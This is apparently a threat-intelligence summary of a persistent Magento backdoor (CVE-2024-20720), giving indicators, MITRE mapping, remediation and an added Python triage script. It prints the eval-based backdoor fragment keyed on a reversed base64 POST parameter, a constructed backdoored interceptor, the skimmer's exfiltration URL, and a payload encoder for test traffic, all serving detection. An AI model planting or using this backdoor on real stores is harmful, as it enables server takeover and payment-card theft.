cyware: Persistent Magento backdoor hidden in XML

Attackers injected PHP shell code into the XML stored in Magento’s layout_update table, abusing the layout parser together with the default beberlei/assert package to run system commands and install a persistent remote code execution backdoor. The backdoor is triggered by a POST to /cms/index and was used to deploy a fake Stripe skimmer that exfiltrated payment data to another compromised store; affected sites should upgrade to a fixed Magento version and scan for hidden backdoors. #Magento #CVE-2024-20720

Keypoints

  • Threat actors injected shell code into the XML stored in the layout_update database table to trigger code execution.
  • The attack chains the Magento layout parser with the default beberlei/assert package to execute system commands on requests to /checkout/cart.
  • A sed command was used to modify the generated CMS controller (Interceptor.php) to add an eval-based backdoor that executes POSTed payloads.
  • The backdoor accepts a POST parameter (7faa27b473), reverses and base64-decodes it, then evals it, allowing remote code execution via /cms/index.
  • The activity is the first observed abuse of CVE-2024-20720 and also delivered a fake Stripe payment skimmer that posted stolen data to a compromised store domain.
  • Observed attacker IPs include 45.146.54.58, 45.146.54.59, 45.146.54.61, 45.146.54.67, 216.73.163.170, and 216.73.163.182.
  • Recommended mitigation: run an eComscan to find hidden backdoors and upgrade Magento to 2.4.6-p4, 2.4.5-p6, or 2.4.4-p7.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Used a Magento vulnerability to inject shell code into the layout_update XML, enabling remote modification of application behavior (‘The attack involved injecting shell code into the XML code of the layout_update database table.’).
  • [T1574] Hijack Execution Flow – Modified generated CMS controller code so execution flow checks for a POST key and evals supplied payloads, causing the application to run attacker code on normal requests (‘___init();\n if ( isset ( $_POST [ "7faa27b473" ]) ) { … @ eval ( $catalogQuery ( strrev ( $_POST ["7faa27b473"] ) ));’).
  • [T1505] Server Software Component – Persisted a backdoor by altering the automatically generated interceptor file via sed to ensure reinfection even after manual fixes or compilation (‘sed -i … adds a backdoor to the (automatically generated) CMS controller.’).
  • [T1059] Command and Scripting Interpreter – Executed dynamically supplied PHP via eval after reversing and base64-decoding a POST parameter, enabling arbitrary command execution (‘@ eval ( $catalogQuery ( strrev ( $_POST ["7faa27b473"] ) ));’).
  • [T1041] Exfiltration Over C2 Channel – Exfiltrated stolen payment data to an externally controlled URL on a compromised Magento store (‘copy payment data to https://halfpriceboxesusa.com/pub/health_check.php’).

Indicators of Compromise

  • [IP Address] attacker hosts observed – 45.146.54.58, 45.146.54.59, 45.146.54.61, 45.146.54.67, 216.73.163.170, 216.73.163.182.
  • [URL] exfiltration endpoint – https://halfpriceboxesusa.com/pub/health_check.php (used by the fake Stripe skimmer to receive stolen payment data; the host is itself a compromised Magento store).
  • [Database table] injection location – layout_update (XML entries in this table contained the malicious payload).
  • [File path] modified/generated file – ../generated/code/Magento/Cms/Controller/Index/Index/Interceptor.php (sed was used to insert the backdoor here).
  • [CVE] exploited vulnerability – CVE-2024-20720 (vulnerability leveraged in the attack).

Attackers placed PHP shell code inside a layout_update XML entry so that Magento’s layout parser, combined with the beberlei/assert package, executes it whenever the checkout/cart layout is rendered. The payload runs a sed command that edits the automatically generated Interceptor.php for the Magento CMS index controller (generated/code/Magento/Cms/Controller/Index/Index/Interceptor.php): immediately after the ___init() call it inserts a check for a specific POST parameter (7faa27b473), reverses and base64-decodes its value, and passes the result to PHP eval. The result is a remote code execution backdoor reachable by any POST to /cms/index.

The design gives the attacker persistence and periodic reinfection: every request to /checkout/cart re-executes the XML payload and re-applies the sed edit, so deleting the modified Interceptor.php or regenerating it with bin/magento setup:di:compile only produces a clean file that is backdoored again on the next cart visit. The backdoor stays gone only once the layout_update entry itself is removed. The attacker also deployed a fake Stripe skimmer that exfiltrated payment information to a compromised Magento domain (https://halfpriceboxesusa.com/pub/health_check.php), combining remote code execution with payment data theft.

Immediate technical remediation steps are to scan for hidden backdoors (the article recommends eComscan), inspect every layout_update row for XML that references Assert classes, shell commands or files under generated/code and delete the malicious entries, then verify and regenerate altered files under generated/code (especially the CMS Index Interceptor.php) only after the layout_update entry is gone, and upgrade Magento to a patched release (2.4.6-p4, 2.4.5-p6, or 2.4.4-p7). Also rotate credentials, review access logs for POST requests to /cms/index and for the listed IPs, and block or investigate the observed attacker hosts.
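A small triage script for the two checks the remediation steps call for (reviewing layout_update rows and the generated Interceptor.php), plus a decoder for the backdoor’s POST encoding described in the mechanism paragraph above. This is an added example, not code from Sansec’s article or from eComscan. It assumes that the $catalogQuery callable in the quoted fragment is base64_decode (the summary says the parameter is reversed and base64-decoded); the indicator strings beyond those named on the page are my own choices; and the sample layout rows and PHP snippets are constructed for illustration, not the attacker’s actual payload.

```python
"""Triage helpers for the layout_update XML backdoor described above.

Added example, not Sansec's or Cyware's tooling. It assumes only what the
summary states: the payload lives in layout_update XML, it runs sed against
generated/code/Magento/Cms/Controller/Index/Index/Interceptor.php, and the
resulting backdoor evals base64_decode(strrev($_POST["7faa27b473"])).
All sample rows and PHP snippets below are constructed for illustration.
"""
import base64
import re

# Strings that have no business in layout XML. "Assert\\Assertion" /
# "beberlei" and the Interceptor.php path come from the summary; the shell
# and PHP-eval tokens are an assumption about what such a payload must carry.
LAYOUT_SUSPICIOUS = (
    "Assert\\Assertion", "beberlei", "Interceptor.php",
    "sed -i", "/bin/sh", "bash -c", "shell_exec", "passthru",
    "system(", "base64_decode", "eval(",
)

# Generated interceptors are pure DI plumbing; any superglobal access or
# dynamic evaluation inside one is a red flag whatever the parameter name.
INTERCEPTOR_SUSPICIOUS = {
    "superglobal": re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b"),
    "eval": re.compile(r"\beval\s*\("),
    "strrev": re.compile(r"\bstrrev\s*\("),
    "base64_decode": re.compile(r"\bbase64_decode\b"),
}


def scan_layout_rows(rows):
    """rows: iterable of (layout_update_id, handle, xml) dumped from the table.
    Returns [(id, handle, [indicators])] for rows that need a manual look."""
    hits = []
    for row_id, handle, xml in rows:
        lowered = xml.lower()
        matched = [s for s in LAYOUT_SUSPICIOUS if s.lower() in lowered]
        if matched:
            hits.append((row_id, handle, matched))
    return hits


def scan_interceptor(source):
    """Return sorted labels of suspicious constructs in a generated Interceptor.php."""
    return sorted(label for label, rx in INTERCEPTOR_SUSPICIOUS.items() if rx.search(source))


def decode_backdoor_payload(post_value):
    """Undo the backdoor's encoding for a value captured in a request log:
    it runs eval(base64_decode(strrev($value))), so reverse first, then decode."""
    return base64.b64decode(post_value[::-1], validate=True).decode("utf-8", "replace")


def encode_backdoor_payload(php):
    """Inverse of decode_backdoor_payload; handy for generating test traffic
    against a lab instance when tuning a WAF or IDS rule for POST /cms/index."""
    return base64.b64encode(php.encode("utf-8"))[::-1].decode("ascii")


# Constructed sample data: one ordinary layout row, one carrying the traits
# the summary describes (not the attacker's actual XML).
SAMPLE_ROWS = [
    (1, "default",
     '<referenceBlock name="footer_links"><action method="setTemplate">'
     '<argument name="template" xsi:type="string">Magento_Theme::html/footer.phtml'
     '</argument></action></referenceBlock>'),
    (2, "checkout_cart_index",
     '<block class="Magento\\Framework\\View\\Element\\Template" name="x">'
     '<arguments><argument name="cmd" xsi:type="string">sed -i '
     '"s/___init();/___init(); BACKDOOR/" '
     '../generated/code/Magento/Cms/Controller/Index/Index/Interceptor.php'
     '</argument></arguments></block>'),
]

# Abridged, constructed interceptor bodies. The backdoored one mirrors the
# quoted fragment; storing "base64_decode" in $catalogQuery is an assumption
# that matches the summary's "reverses and base64-decodes" description.
CLEAN_INTERCEPTOR = """<?php
namespace Magento\\Cms\\Controller\\Index\\Index;
class Interceptor extends \\Magento\\Cms\\Controller\\Index\\Index
{
    use \\Magento\\Framework\\Interception\\Interceptor;
    public function __construct(...$args) { $this->___init(); parent::__construct(...$args); }
}
"""
BACKDOORED_INTERCEPTOR = CLEAN_INTERCEPTOR.replace(
    "$this->___init();",
    '$this->___init();\n if (isset($_POST["7faa27b473"])) { $catalogQuery = "base64_decode"; '
    '@eval($catalogQuery(strrev($_POST["7faa27b473"]))); }',
)

if __name__ == "__main__":
    for row_id, handle, matched in scan_layout_rows(SAMPLE_ROWS):
        print(f"layout_update id={row_id} handle={handle}: {matched}")
    print("clean interceptor:", scan_interceptor(CLEAN_INTERCEPTOR))
    print("backdoored interceptor:", scan_interceptor(BACKDOORED_INTERCEPTOR))
    print(decode_backdoor_payload(encode_backdoor_payload("phpinfo();")))
```

In practice, feed scan_layout_rows with a dump of layout_update (id, handle, xml) and scan_interceptor with the contents of each Interceptor.php under generated/code; the string-based interceptor checks deliberately do not depend on the 7faa27b473 parameter name, since a parameter name is trivial for an attacker to change. Only remove the flagged layout_update rows first, then regenerate the interceptors, or the next /checkout/cart request reinstalls the backdoor.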

Read more: https://sansec.io/research/magento-xml-backdoor